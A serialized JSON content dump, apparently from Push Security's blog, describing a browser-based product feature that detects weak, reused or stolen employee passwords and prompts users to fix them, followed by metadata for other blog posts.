identify the login methods an account is using, whether that’s SAML, OIDC, or password.",[111881],{"type":370},{},{"nodeType":178,"data":111884,"content":111885},{},[111886],{"nodeType":173,"value":111887,"marks":111888,"data":111889},"Again, because Push observes the login event, it can analyze the authentication method or methods in use by a given account. Push tells you which SSO accounts still have passwords associated with them, and which authentication methods are being actively used.",[],{},{"nodeType":312,"data":111891,"content":111895},{"target":111892},{"sys":111893},{"id":111894,"type":317,"linkType":318},"pVD238hZ331gjWalDTM1q",[],{"nodeType":235,"data":111897,"content":111898},{},[111899],{"nodeType":173,"value":111900,"marks":111901,"data":111903},"3. A method for analyzing whether an employee is using secure passwords on all their accounts.",[111902],{"type":370},{},{"nodeType":178,"data":111905,"content":111906},{},[111907,111911,111920],{"nodeType":173,"value":111908,"marks":111909,"data":111910},"Using Push, you can also check the posture of all your employee accounts. The browser agent accomplishes this by ",[],{},{"nodeType":186,"data":111912,"content":111914},{"uri":111913},"https://pushsecurity.com/help/10065#start",[111915],{"nodeType":173,"value":111916,"marks":111917,"data":111919},"creating a salted hash",[111918],{"type":194},{},{"nodeType":173,"value":111921,"marks":111922,"data":111923}," of a user’s observed password and then taking the first 8 characters of that hash to store locally in the browser.",[],{},{"nodeType":178,"data":111925,"content":111926},{},[111927],{"nodeType":173,"value":111928,"marks":111929,"data":111930},"This allows Push to analyze whether the password is weak (comparing the hash to a list of 10,000 common basewords and common permutations); or reused across accounts.",[],{},{"nodeType":178,"data":111932,"content":111933},{},[111934,111938,111947,111951,111960],{"nodeType":173,"value":111935,"marks":111936,"data":111937},"Push can also identify when employee passwords have ",[],{},{"nodeType":186,"data":111939,"content":111941},{"uri":111940},"https://pushsecurity.com/help/10066#start",[111942],{"nodeType":173,"value":111943,"marks":111944,"data":111946},"appeared in a public breach list",[111945],{"type":194},{},{"nodeType":173,"value":111948,"marks":111949,"data":111950}," using the Have I Been Pwned service, using a k-anonymized hash. Using similar secure methods, Push can detect when employees are sharing account credentials, whether they’re using a ",[],{},{"nodeType":186,"data":111952,"content":111954},{"uri":111953},"https://pushsecurity.com/help/10085/#start",[111955],{"nodeType":173,"value":111956,"marks":111957,"data":111959},"password manager",[111958],{"type":194},{},{"nodeType":173,"value":111961,"marks":111962,"data":111963},", and which one.",[],{},{"nodeType":178,"data":111965,"content":111966},{},[111967,111970,111979],{"nodeType":173,"value":2596,"marks":111968,"data":111969},[],{},{"nodeType":186,"data":111971,"content":111972},{"uri":62639},[111973],{"nodeType":173,"value":111974,"marks":111975,"data":111978},"Stolen credentials detection",[111976,111977],{"type":194},{"type":370},{},{"nodeType":173,"value":111980,"marks":111981,"data":111982}," feature, you can also get alerted when an employee is using credentials that match those for sale in criminal forums. Push integrates with commercial threat intelligence sources to perform these matches, and you can also bring your own TI using the Push REST API to perform additional checks for in-use stolen creds. This check still happens locally in the browser, so no hashes are sent to third-party systems.",[],{},{"nodeType":312,"data":111984,"content":111987},{"target":111985},{"sys":111986},{"id":105077,"type":317,"linkType":318},[],{"nodeType":178,"data":111989,"content":111990},{},[111991,111995,112004],{"nodeType":173,"value":111992,"marks":111993,"data":111994},"If you configure Push to also monitor for employees who are logging in to work apps using ",[],{},{"nodeType":186,"data":111996,"content":111998},{"uri":111997},"https://pushsecurity.com/help/10105#start",[111999],{"nodeType":173,"value":112000,"marks":112001,"data":112003},"personal email addresses",[112002],{"type":194},{},{"nodeType":173,"value":112005,"marks":112006,"data":112007}," or any non-corporate email, Push can identify when personal accounts and work accounts are reusing passwords for the same work application.",[],{},{"nodeType":178,"data":112009,"content":112010},{},[112011,112015,112024],{"nodeType":173,"value":112012,"marks":112013,"data":112014},"Using the Push ",[],{},{"nodeType":186,"data":112016,"content":112018},{"uri":112017},"https://pushsecurity.com/help/audience/administrators/docs/getting-started/#api-and-webhooks",[112019],{"nodeType":173,"value":112020,"marks":112021,"data":112023},"REST API and webhooks",[112022],{"type":194},{},{"nodeType":173,"value":112025,"marks":112026,"data":112027},", you can get alerted when Push raises a security finding for an account, and when a finding is resolved.",[],{},{"nodeType":235,"data":112029,"content":112030},{},[112031],{"nodeType":173,"value":112032,"marks":112033,"data":112035},"4. The ability to solve any issues at scale, including remediating bad passwords and enforcing MFA, even on apps where the security team doesn’t have administrative control.",[112034],{"type":370},{},{"nodeType":178,"data":112037,"content":112038},{},[112039],{"nodeType":173,"value":112040,"marks":112041,"data":112042},"Finally, you can enforce self-remediation workflows using Push’s position in the browser, right where employees are working. ",[],{},{"nodeType":178,"data":112044,"content":112045},{},[112046],{"nodeType":173,"value":112047,"marks":112048,"data":112049},"Push recently released a new in-browser control to enforce strong passwords. It works by detecting when an employee has a password security issue, and then prompting them to update their password by displaying a customizable banner message when they log in to the affected account.",[],{},{"nodeType":312,"data":112051,"content":112055},{"target":112052},{"sys":112053},{"id":112054,"type":317,"linkType":318},"4IfBLaE66CJSsb5h44vSNp",[],{"nodeType":178,"data":112057,"content":112058},{},[112059,112063,112070],{"nodeType":173,"value":112060,"marks":112061,"data":112062},"This control complements an existing ",[],{},{"nodeType":186,"data":112064,"content":112065},{"uri":77513},[112066],{"nodeType":173,"value":2570,"marks":112067,"data":112069},[112068],{"type":194},{},{"nodeType":173,"value":112071,"marks":112072,"data":112073}," guardrail, which uses a similar workflow to prompt employees to register for MFA on apps where it’s missing.",[],{},{"nodeType":231,"data":112075,"content":112076},{},[],{"nodeType":169,"data":112078,"content":112079},{},[112080],{"nodeType":173,"value":112081,"marks":112082,"data":112084},"A closer look at password enforcement",[112083],{"type":370},{},{"nodeType":178,"data":112086,"content":112087},{},[112088,112092,112096],{"nodeType":173,"value":112089,"marks":112090,"data":112091},"In the spirit of helping users do the right thing, we designed the",[],{},{"nodeType":173,"value":3107,"marks":112093,"data":112095},[112094],{"type":370},{},{"nodeType":173,"value":112097,"marks":112098,"data":112099},"password enforcement control to meet users where they are, in the most relevant context where they can fix the problem. ",[],{},{"nodeType":178,"data":112101,"content":112102},{},[112103],{"nodeType":173,"value":112104,"marks":112105,"data":112106},"Because this control is powered by the Push browser agent, security teams don’t need administrative control over every app where password accounts exist — which often isn’t practical for all the reasons we reviewed earlier. Instead, they can use Push to prompt employees to fix the issue themselves.",[],{},{"nodeType":178,"data":112108,"content":112109},{},[112110],{"nodeType":173,"value":71740,"marks":112111,"data":112112},[],{},{"nodeType":250,"data":112114,"content":112115},{},[112116,112141,112151],{"nodeType":254,"data":112117,"content":112118},{},[112119],{"nodeType":178,"data":112120,"content":112121},{},[112122,112125,112129,112133,112137],{"nodeType":173,"value":18635,"marks":112123,"data":112124},[],{},{"nodeType":173,"value":2578,"marks":112126,"data":112128},[112127],{"type":370},{},{"nodeType":173,"value":112130,"marks":112131,"data":112132}," from the tile on the ",[],{},{"nodeType":173,"value":18649,"marks":112134,"data":112136},[112135],{"type":370},{},{"nodeType":173,"value":112138,"marks":112139,"data":112140}," page of the Push admin console. ",[],{},{"nodeType":254,"data":112142,"content":112143},{},[112144],{"nodeType":178,"data":112145,"content":112146},{},[112147],{"nodeType":173,"value":112148,"marks":112149,"data":112150},"Using the rule editor, select whether you want to apply the control for all employees, or just specific groups or individuals, and which apps it should apply to. You can also select which types of password security issues you want to prompt users about.",[],{},{"nodeType":254,"data":112152,"content":112153},{},[112154],{"nodeType":178,"data":112155,"content":112156},{},[112157],{"nodeType":173,"value":112158,"marks":112159,"data":112160},"Then customize the message that employees will see. Push will then automatically display the banner based on your criteria. Where possible, Push will include a link in the banner that takes employees directly to the page in the app where they can change their password — or you can add a link yourself.",[],{},{"nodeType":312,"data":112162,"content":112165},{"target":112163},{"sys":112164},{"id":77578,"type":317,"linkType":318},[],{"nodeType":178,"data":112167,"content":112168},{},[112169],{"nodeType":173,"value":112170,"marks":112171,"data":112172},"Once the password has been changed and Push verifies that the new password is strong, you’ll see the security finding cleared from the account record in the admin console and the banner will no longer display to the end-user.",[],{},{"nodeType":178,"data":112174,"content":112175},{},[112176],{"nodeType":173,"value":112177,"marks":112178,"data":112179},"Push also sends webhook events when:",[],{},{"nodeType":250,"data":112181,"content":112182},{},[112183,112193,112203,112213],{"nodeType":254,"data":112184,"content":112185},{},[112186],{"nodeType":178,"data":112187,"content":112188},{},[112189],{"nodeType":173,"value":112190,"marks":112191,"data":112192},"A banner is displayed",[],{},{"nodeType":254,"data":112194,"content":112195},{},[112196],{"nodeType":178,"data":112197,"content":112198},{},[112199],{"nodeType":173,"value":112200,"marks":112201,"data":112202},"A user clicks the link in the banner to take action",[],{},{"nodeType":254,"data":112204,"content":112205},{},[112206],{"nodeType":178,"data":112207,"content":112208},{},[112209],{"nodeType":173,"value":112210,"marks":112211,"data":112212},"A password is updated",[],{},{"nodeType":254,"data":112214,"content":112215},{},[112216],{"nodeType":178,"data":112217,"content":112218},{},[112219],{"nodeType":173,"value":112220,"marks":112221,"data":112222},"A password security finding is resolved",[],{},{"nodeType":231,"data":112224,"content":112225},{},[],{"nodeType":169,"data":112227,"content":112228},{},[112229],{"nodeType":173,"value":112230,"marks":112231,"data":112233},"Where to begin",[112232],{"type":370},{},{"nodeType":178,"data":112235,"content":112236},{},[112237],{"nodeType":173,"value":112238,"marks":112239,"data":112240},"Most organizations we work with deploy the Push agent first to get an initial understanding of their attack surface and account posture issues. Then we recommend enabling the one-two punch of MFA and strong password enforcement guardrails. You can use both controls in tandem, and Push will first seek to resolve the password issues on a given account, and then prompt the user to register for MFA.",[],{},{"nodeType":231,"data":112242,"content":112243},{},[],{"nodeType":169,"data":112245,"content":112246},{},[112247],{"nodeType":173,"value":71801,"marks":112248,"data":112249},[],{},{"nodeType":178,"data":112251,"content":112252},{},[112253,112257,112264],{"nodeType":173,"value":112254,"marks":112255,"data":112256},"If you want to learn more about how Push helps you to detect and defeat common identity attack techniques like AiTM phishing, credential stuffing, and session hijacking while improving your workforce identity posture, book some time with one of our team for a ",[],{},{"nodeType":186,"data":112258,"content":112259},{"uri":473},[112260],{"nodeType":173,"value":2889,"marks":112261,"data":112263},[112262],{"type":194},{},{"nodeType":173,"value":1477,"marks":112265,"data":112266},[],{},"Detects when employees have weak, reused, or stolen passwords and guide them to update their password using in-browser messaging on any app. ",{"items":112269},[112270,112272],{"sys":112271,"name":26137},{"id":26136},{"sys":112273,"name":505},{"id":504},{"items":112275},[112276],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":112277},{"url":2911},{"items":112279},[112280],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":112281},{"url":516},{"json":112283,"links":112577},{"nodeType":165,"data":112284,"content":112285},{},[112286,112292,112298,112304,112309,112315,112345,112351,112357,112363,112368,112374,112380,112395,112400,112406,112422,112438,112444,112450,112456,112462,112468,112474,112480,112496,112502,112508,112513,112519,112525,112545,112550,112566,112571],{"nodeType":178,"data":112287,"content":112288},{},[112289],{"nodeType":173,"value":87881,"marks":112290,"data":112291},[],{},{"nodeType":178,"data":112293,"content":112294},{},[112295],{"nodeType":173,"value":87888,"marks":112296,"data":112297},[],{},{"nodeType":178,"data":112299,"content":112300},{},[112301],{"nodeType":173,"value":87895,"marks":112302,"data":112303},[],{},{"nodeType":312,"data":112305,"content":112308},{"target":112306},{"sys":112307},{"id":87902,"type":317,"linkType":318},[],{"nodeType":178,"data":112310,"content":112311},{},[112312],{"nodeType":173,"value":87908,"marks":112313,"data":112314},[],{},{"nodeType":250,"data":112316,"content":112317},{},[112318,112327,112336],{"nodeType":254,"data":112319,"content":112320},{},[112321],{"nodeType":178,"data":112322,"content":112323},{},[112324],{"nodeType":173,"value":87921,"marks":112325,"data":112326},[],{},{"nodeType":254,"data":112328,"content":112329},{},[112330],{"nodeType":178,"data":112331,"content":112332},{},[112333],{"nodeType":173,"value":87931,"marks":112334,"data":112335},[],{},{"nodeType":254,"data":112337,"content":112338},{},[112339],{"nodeType":178,"data":112340,"content":112341},{},[112342],{"nodeType":173,"value":87941,"marks":112343,"data":112344},[],{},{"nodeType":178,"data":112346,"content":112347},{},[112348],{"nodeType":173,"value":87948,"marks":112349,"data":112350},[],{},{"nodeType":169,"data":112352,"content":112353},{},[112354],{"nodeType":173,"value":87955,"marks":112355,"data":112356},[],{},{"nodeType":178,"data":112358,"content":112359},{},[112360],{"nodeType":173,"value":87962,"marks":112361,"data":112362},[],{},{"nodeType":312,"data":112364,"content":112367},{"target":112365},{"sys":112366},{"id":87969,"type":317,"linkType":318},[],{"nodeType":178,"data":112369,"content":112370},{},[112371],{"nodeType":173,"value":87975,"marks":112372,"data":112373},[],{},{"nodeType":169,"data":112375,"content":112376},{},[112377],{"nodeType":173,"value":87982,"marks":112378,"data":112379},[],{},{"nodeType":178,"data":112381,"content":112382},{},[112383,112386,112392],{"nodeType":173,"value":87989,"marks":112384,"data":112385},[],{},{"nodeType":186,"data":112387,"content":112388},{"uri":63182},[112389],{"nodeType":173,"value":87996,"marks":112390,"data":112391},[],{},{"nodeType":173,"value":88000,"marks":112393,"data":112394},[],{},{"nodeType":312,"data":112396,"content":112399},{"target":112397},{"sys":112398},{"id":88007,"type":317,"linkType":318},[],{"nodeType":235,"data":112401,"content":112402},{},[112403],{"nodeType":173,"value":88013,"marks":112404,"data":112405},[],{},{"nodeType":178,"data":112407,"content":112408},{},[112409,112412,112419],{"nodeType":173,"value":88020,"marks":112410,"data":112411},[],{},{"nodeType":186,"data":112413,"content":112414},{"uri":88025},[112415],{"nodeType":173,"value":88028,"marks":112416,"data":112418},[112417],{"type":194},{},{"nodeType":173,"value":88033,"marks":112420,"data":112421},[],{},{"nodeType":178,"data":112423,"content":112424},{},[112425,112428,112435],{"nodeType":173,"value":88040,"marks":112426,"data":112427},[],{},{"nodeType":186,"data":112429,"content":112430},{"uri":989},[112431],{"nodeType":173,"value":992,"marks":112432,"data":112434},[112433],{"type":194},{},{"nodeType":173,"value":88051,"marks":112436,"data":112437},[],{},{"nodeType":178,"data":112439,"content":112440},{},[112441],{"nodeType":173,"value":88058,"marks":112442,"data":112443},[],{},{"nodeType":178,"data":112445,"content":112446},{},[112447],{"nodeType":173,"value":88065,"marks":112448,"data":112449},[],{},{"nodeType":235,"data":112451,"content":112452},{},[112453],{"nodeType":173,"value":88072,"marks":112454,"data":112455},[],{},{"nodeType":178,"data":112457,"content":112458},{},[112459],{"nodeType":173,"value":88079,"marks":112460,"data":112461},[],{},{"nodeType":178,"data":112463,"content":112464},{},[112465],{"nodeType":173,"value":88086,"marks":112466,"data":112467},[],{},{"nodeType":169,"data":112469,"content":112470},{},[112471],{"nodeType":173,"value":88093,"marks":112472,"data":112473},[],{},{"nodeType":178,"data":112475,"content":112476},{},[112477],{"nodeType":173,"value":88100,"marks":112478,"data":112479},[],{},{"nodeType":178,"data":112481,"content":112482},{},[112483,112486,112493],{"nodeType":173,"value":88107,"marks":112484,"data":112485},[],{},{"nodeType":186,"data":112487,"content":112488},{"uri":88112},[112489],{"nodeType":173,"value":88115,"marks":112490,"data":112492},[112491],{"type":194},{},{"nodeType":173,"value":88120,"marks":112494,"data":112495},[],{},{"nodeType":178,"data":112497,"content":112498},{},[112499],{"nodeType":173,"value":88127,"marks":112500,"data":112501},[],{},{"nodeType":178,"data":112503,"content":112504},{},[112505],{"nodeType":173,"value":88134,"marks":112506,"data":112507},[],{},{"nodeType":312,"data":112509,"content":112512},{"target":112510},{"sys":112511},{"id":88141,"type":317,"linkType":318},[],{"nodeType":169,"data":112514,"content":112515},{},[112516],{"nodeType":173,"value":88147,"marks":112517,"data":112518},[],{},{"nodeType":178,"data":112520,"content":112521},{},[112522],{"nodeType":173,"value":88154,"marks":112523,"data":112524},[],{},{"nodeType":178,"data":112526,"content":112527},{},[112528,112531,112535,112538,112542],{"nodeType":173,"value":65787,"marks":112529,"data":112530},[],{},{"nodeType":173,"value":2789,"marks":112532,"data":112534},[112533],{"type":370},{},{"nodeType":173,"value":65795,"marks":112536,"data":112537},[],{},{"nodeType":173,"value":65800,"marks":112539,"data":112541},[112540],{"type":370},{},{"nodeType":173,"value":65804,"marks":112543,"data":112544},[],{},{"nodeType":312,"data":112546,"content":112549},{"target":112547},{"sys":112548},{"id":88181,"type":317,"linkType":318},[],{"nodeType":178,"data":112551,"content":112552},{},[112553,112556,112563],{"nodeType":173,"value":88187,"marks":112554,"data":112555},[],{},{"nodeType":186,"data":112557,"content":112558},{"uri":473},[112559],{"nodeType":173,"value":88194,"marks":112560,"data":112562},[112561],{"type":194},{},{"nodeType":173,"value":88199,"marks":112564,"data":112565},[],{},{"nodeType":312,"data":112567,"content":112570},{"target":112568},{"sys":112569},{"id":88206,"type":317,"linkType":318},[],{"nodeType":178,"data":112572,"content":112573},{},[112574],{"nodeType":173,"value":37,"marks":112575,"data":112576},[],{},{"entries":112578},{"hyperlink":112579,"inline":112580,"block":112581},[],[],[112582,112588,112595,112597,112605,112635],{"sys":112583,"__typename":5345,"title":112584,"caption":118,"layoutMode":112585,"file":112586},{"id":87902},"Screenshot of an employee verification code seen in the browser ","Centre aligned",{"url":112587,"width":46413,"height":46414},"https://images.ctfassets.net/y1cdw1ablpvd/6NN7y6uMvJZimdyX7iXI0Z/23ce9794d9508f5b7706ef8e5e928189/employee_verification_code_annotated.png",{"sys":112589,"__typename":5345,"title":112590,"caption":118,"layoutMode":118,"file":112591},{"id":87969},"Eric from GitLab's quote about Push Security's Employee Identity Verification Code feature",{"url":112592,"width":112593,"height":112594},"https://images.ctfassets.net/y1cdw1ablpvd/5n0gGVgLPdwYutOsrVhPCm/504144852029af2b59e0c2abc336b2bf/Group_544__1_.png",7204,3100,{"sys":112596,"__typename":15269,"type":15270,"ctaText":102964,"buttonLabel":102965,"buttonColour":15273,"buttonUrl":102966},{"id":88007},{"sys":112598,"__typename":5345,"title":112599,"caption":112600,"layoutMode":112585,"file":112601},{"id":88141},"Push's control coverage across a typical Scattered Spider attack chain","Coverage of Push’s controls across a typical Scattered Spider attack chain",{"url":112602,"width":112603,"height":112604},"https://images.ctfassets.net/y1cdw1ablpvd/1nmpSqVCUUa3FY6Vc74zh9/07e800d974017def0c35d54caa02f1a3/Screenshot_2025-06-19_at_10.29.48.png",1264,710,{"sys":112606,"__typename":5311,"content":112607,"name":112634,"title":118},{"id":88181},{"json":112608},{"nodeType":165,"data":112609,"content":112610},{},[112611,112618],{"nodeType":178,"data":112612,"content":112613},{},[112614],{"nodeType":173,"value":112615,"marks":112616,"data":112617},"We're also offering this feature as a free tool for security teams that aren't currently Push customers, but want to start using this browser-based verification code as part of their help desk caller identification process. ",[],{},{"nodeType":178,"data":112619,"content":112620},{},[112621,112624,112631],{"nodeType":173,"value":37,"marks":112622,"data":112623},[],{},{"nodeType":186,"data":112625,"content":112626},{"uri":101294},[112627],{"nodeType":173,"value":112628,"marks":112629,"data":112630},"Find out more here. ",[],{},{"nodeType":173,"value":37,"marks":112632,"data":112633},[],{},"Verification codes insight box 1",{"sys":112636,"__typename":15269,"type":112637,"ctaText":112638,"buttonLabel":93499,"buttonColour":15273,"buttonUrl":473},{"id":88206},"Demo","Want to find out how else Push can stop identity attacks in the browser?","content:blog:employee-identity-verification-codes-release.json","blog/employee-identity-verification-codes-release.json","blog/employee-identity-verification-codes-release",{"_path":112643,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":112644,"ogImage":118,"summary":112646,"title":66077,"subtitle":118,"metaTitle":112657,"synopsis":66078,"hashTags":118,"publishedDate":66079,"slug":66080,"tagsCollection":112658,"relatedBlogPostsCollection":112662,"authorsCollection":113104,"content":113108,"_id":113588,"_type":5439,"_source":5440,"_file":113589,"_stem":113590,"_extension":5439},"/blog/product-release-june-2025",{"id":65608,"publishedAt":112645},"2025-06-09T13:22:41.415Z",{"json":112647},{"data":112648,"content":112649,"nodeType":165},{},[112650],{"data":112651,"content":112652,"nodeType":178},{},[112653],{"data":112654,"marks":112655,"value":112656,"nodeType":173},{},[],"Streamline investigations with our new Detections page, enforce strong passwords in the browser, and more","Push Security new product features for June 2025",{"items":112659},[112660],{"sys":112661,"name":18399},{"id":18398},{"items":112663},[112664],{"__typename":1528,"sys":112665,"content":112666,"title":83751,"synopsis":83752,"hashTags":118,"publishedDate":83753,"slug":83754,"tagsCollection":113096,"authorsCollection":113100},{"id":83266},{"json":112667},{"data":112668,"content":112669,"nodeType":165},{},[112670,112676,112724,112730,112743,112749,112809,112814,112831,112837,112850,112863,112868,112874,112891,112897,112910,112923,112929,112946,112952,112972,112978,112993,112999,113012,113046,113085,113090],{"data":112671,"content":112672,"nodeType":169},{},[112673],{"data":112674,"marks":112675,"value":18415,"nodeType":173},{},[],{"data":112677,"content":112678,"nodeType":250},{},[112679,112688,112697,112706,112715],{"data":112680,"content":112681,"nodeType":254},{},[112682],{"data":112683,"content":112684,"nodeType":178},{},[112685],{"data":112686,"marks":112687,"value":83289,"nodeType":173},{},[],{"data":112689,"content":112690,"nodeType":254},{},[112691],{"data":112692,"content":112693,"nodeType":178},{},[112694],{"data":112695,"marks":112696,"value":83299,"nodeType":173},{},[],{"data":112698,"content":112699,"nodeType":254},{},[112700],{"data":112701,"content":112702,"nodeType":178},{},[112703],{"data":112704,"marks":112705,"value":83309,"nodeType":173},{},[],{"data":112707,"content":112708,"nodeType":254},{},[112709],{"data":112710,"content":112711,"nodeType":178},{},[112712],{"data":112713,"marks":112714,"value":83319,"nodeType":173},{},[],{"data":112716,"content":112717,"nodeType":254},{},[112718],{"data":112719,"content":112720,"nodeType":178},{},[112721],{"data":112722,"marks":112723,"value":83329,"nodeType":173},{},[],{"data":112725,"content":112726,"nodeType":169},{},[112727],{"data":112728,"marks":112729,"value":83289,"nodeType":173},{},[],{"data":112731,"content":112732,"nodeType":178},{},[112733,112736,112740],{"data":112734,"marks":112735,"value":65284,"nodeType":173},{},[],{"data":112737,"marks":112738,"value":83346,"nodeType":173},{},[112739],{"type":370},{"data":112741,"marks":112742,"value":83350,"nodeType":173},{},[],{"data":112744,"content":112745,"nodeType":178},{},[112746],{"data":112747,"marks":112748,"value":83357,"nodeType":173},{},[],{"data":112750,"content":112751,"nodeType":250},{},[112752,112768,112784,112800],{"data":112753,"content":112754,"nodeType":254},{},[112755],{"data":112756,"content":112757,"nodeType":178},{},[112758,112761,112765],{"data":112759,"marks":112760,"value":83370,"nodeType":173},{},[],{"data":112762,"marks":112763,"value":83375,"nodeType":173},{},[112764],{"type":370},{"data":112766,"marks":112767,"value":83379,"nodeType":173},{},[],{"data":112769,"content":112770,"nodeType":254},{},[112771],{"data":112772,"content":112773,"nodeType":178},{},[112774,112777,112781],{"data":112775,"marks":112776,"value":83389,"nodeType":173},{},[],{"data":112778,"marks":112779,"value":83394,"nodeType":173},{},[112780],{"type":370},{"data":112782,"marks":112783,"value":1477,"nodeType":173},{},[],{"data":112785,"content":112786,"nodeType":254},{},[112787],{"data":112788,"content":112789,"nodeType":178},{},[112790,112793,112797],{"data":112791,"marks":112792,"value":83407,"nodeType":173},{},[],{"data":112794,"marks":112795,"value":83412,"nodeType":173},{},[112796],{"type":370},{"data":112798,"marks":112799,"value":83416,"nodeType":173},{},[],{"data":112801,"content":112802,"nodeType":254},{},[112803],{"data":112804,"content":112805,"nodeType":178},{},[112806],{"data":112807,"marks":112808,"value":83426,"nodeType":173},{},[],{"data":112810,"content":112813,"nodeType":312},{"target":112811},{"sys":112812},{"id":83431,"type":317,"linkType":318},[],{"data":112815,"content":112816,"nodeType":178},{},[112817,112820,112828],{"data":112818,"marks":112819,"value":37,"nodeType":173},{},[],{"data":112821,"content":112824,"nodeType":1698},{"target":112822},{"sys":112823},{"id":83443,"type":317,"linkType":318},[112825],{"data":112826,"marks":112827,"value":18605,"nodeType":173},{},[],{"data":112829,"marks":112830,"value":37,"nodeType":173},{},[],{"data":112832,"content":112833,"nodeType":169},{},[112834],{"data":112835,"marks":112836,"value":83457,"nodeType":173},{},[],{"data":112838,"content":112839,"nodeType":178},{},[112840,112843,112847],{"data":112841,"marks":112842,"value":83464,"nodeType":173},{},[],{"data":112844,"marks":112845,"value":83469,"nodeType":173},{},[112846],{"type":370},{"data":112848,"marks":112849,"value":83473,"nodeType":173},{},[],{"data":112851,"content":112852,"nodeType":178},{},[112853,112856,112860],{"data":112854,"marks":112855,"value":83480,"nodeType":173},{},[],{"data":112857,"marks":112858,"value":2789,"nodeType":173},{},[112859],{"type":370},{"data":112861,"marks":112862,"value":83488,"nodeType":173},{},[],{"data":112864,"content":112867,"nodeType":312},{"target":112865},{"sys":112866},{"id":83493,"type":317,"linkType":318},[],{"data":112869,"content":112870,"nodeType":178},{},[112871],{"data":112872,"marks":112873,"value":83501,"nodeType":173},{},[],{"data":112875,"content":112876,"nodeType":178},{},[112877,112880,112888],{"data":112878,"marks":112879,"value":37,"nodeType":173},{},[],{"data":112881,"content":112884,"nodeType":1698},{"target":112882},{"sys":112883},{"id":83512,"type":317,"linkType":318},[112885],{"data":112886,"marks":112887,"value":18605,"nodeType":173},{},[],{"data":112889,"marks":112890,"value":37,"nodeType":173},{},[],{"data":112892,"content":112893,"nodeType":169},{},[112894],{"data":112895,"marks":112896,"value":83526,"nodeType":173},{},[],{"data":112898,"content":112899,"nodeType":178},{},[112900,112903,112907],{"data":112901,"marks":112902,"value":65284,"nodeType":173},{},[],{"data":112904,"marks":112905,"value":83537,"nodeType":173},{},[112906],{"type":370},{"data":112908,"marks":112909,"value":83541,"nodeType":173},{},[],{"data":112911,"content":112912,"nodeType":178},{},[112913,112916,112920],{"data":112914,"marks":112915,"value":83548,"nodeType":173},{},[],{"data":112917,"marks":112918,"value":83553,"nodeType":173},{},[112919],{"type":370},{"data":112921,"marks":112922,"value":1477,"nodeType":173},{},[],{"data":112924,"content":112925,"nodeType":178},{},[112926],{"data":112927,"marks":112928,"value":83563,"nodeType":173},{},[],{"data":112930,"content":112931,"nodeType":178},{},[112932,112935,112943],{"data":112933,"marks":112934,"value":37,"nodeType":173},{},[],{"data":112936,"content":112939,"nodeType":1698},{"target":112937},{"sys":112938},{"id":83574,"type":317,"linkType":318},[112940],{"data":112941,"marks":112942,"value":18605,"nodeType":173},{},[],{"data":112944,"marks":112945,"value":37,"nodeType":173},{},[],{"data":112947,"content":112948,"nodeType":169},{},[112949],{"data":112950,"marks":112951,"value":83588,"nodeType":173},{},[],{"data":112953,"content":112954,"nodeType":178},{},[112955,112958,112962,112965,112969],{"data":112956,"marks":112957,"value":83595,"nodeType":173},{},[],{"data":112959,"marks":112960,"value":83600,"nodeType":173},{},[112961],{"type":370},{"data":112963,"marks":112964,"value":83604,"nodeType":173},{},[],{"data":112966,"marks":112967,"value":83609,"nodeType":173},{},[112968],{"type":370},{"data":112970,"marks":112971,"value":2340,"nodeType":173},{},[],{"data":112973,"content":112974,"nodeType":178},{},[112975],{"data":112976,"marks":112977,"value":83619,"nodeType":173},{},[],{"data":112979,"content":112980,"nodeType":178},{},[112981,112984,112990],{"data":112982,"marks":112983,"value":37,"nodeType":173},{},[],{"data":112985,"content":112986,"nodeType":186},{"uri":83628},[112987],{"data":112988,"marks":112989,"value":18605,"nodeType":173},{},[],{"data":112991,"marks":112992,"value":37,"nodeType":173},{},[],{"data":112994,"content":112995,"nodeType":169},{},[112996],{"data":112997,"marks":112998,"value":83329,"nodeType":173},{},[],{"data":113000,"content":113001,"nodeType":178},{},[113002,113005,113009],{"data":113003,"marks":113004,"value":83648,"nodeType":173},{},[],{"data":113006,"marks":113007,"value":83653,"nodeType":173},{},[113008],{"type":370},{"data":113010,"marks":113011,"value":83657,"nodeType":173},{},[],{"data":113013,"content":113014,"nodeType":178},{},[113015,113018,113022,113025,113029,113032,113036,113039,113043],{"data":113016,"marks":113017,"value":83664,"nodeType":173},{},[],{"data":113019,"marks":113020,"value":83669,"nodeType":173},{},[113021],{"type":370},{"data":113023,"marks":113024,"value":2936,"nodeType":173},{},[],{"data":113026,"marks":113027,"value":71552,"nodeType":173},{},[113028],{"type":370},{"data":113030,"marks":113031,"value":2936,"nodeType":173},{},[],{"data":113033,"marks":113034,"value":71581,"nodeType":173},{},[113035],{"type":370},{"data":113037,"marks":113038,"value":9534,"nodeType":173},{},[],{"data":113040,"marks":113041,"value":83691,"nodeType":173},{},[113042],{"type":370},{"data":113044,"marks":113045,"value":83695,"nodeType":173},{},[],{"data":113047,"content":113048,"nodeType":250},{},[113049,113058,113067,113076],{"data":113050,"content":113051,"nodeType":254},{},[113052],{"data":113053,"content":113054,"nodeType":178},{},[113055],{"data":113056,"marks":113057,"value":83708,"nodeType":173},{},[],{"data":113059,"content":113060,"nodeType":254},{},[113061],{"data":113062,"content":113063,"nodeType":178},{},[113064],{"data":113065,"marks":113066,"value":83718,"nodeType":173},{},[],{"data":113068,"content":113069,"nodeType":254},{},[113070],{"data":113071,"content":113072,"nodeType":178},{},[113073],{"data":113074,"marks":113075,"value":83728,"nodeType":173},{},[],{"data":113077,"content":113078,"nodeType":254},{},[113079],{"data":113080,"content":113081,"nodeType":178},{},[113082],{"data":113083,"marks":113084,"value":83738,"nodeType":173},{},[],{"data":113086,"content":113089,"nodeType":312},{"target":113087},{"sys":113088},{"id":83743,"type":317,"linkType":318},[],{"data":113091,"content":113092,"nodeType":178},{},[113093],{"data":113094,"marks":113095,"value":37,"nodeType":173},{},[],{"items":113097},[113098],{"sys":113099,"name":18399},{"id":18398},{"items":113101},[113102],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":113103},{"url":19129},{"items":113105},[113106],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":113107},{"url":19129},{"json":113109,"links":113528},{"data":113110,"content":113111,"nodeType":165},{},[113112,113118,113184,113190,113203,113209,113214,113231,113237,113250,113256,113262,113282,113287,113293,113306,113312,113317,113334,113340,113353,113359,113365,113370,113387,113393,113406,113412,113417,113432,113438,113465,113478,113483,113498,113504,113517,113522],{"data":113113,"content":113114,"nodeType":169},{},[1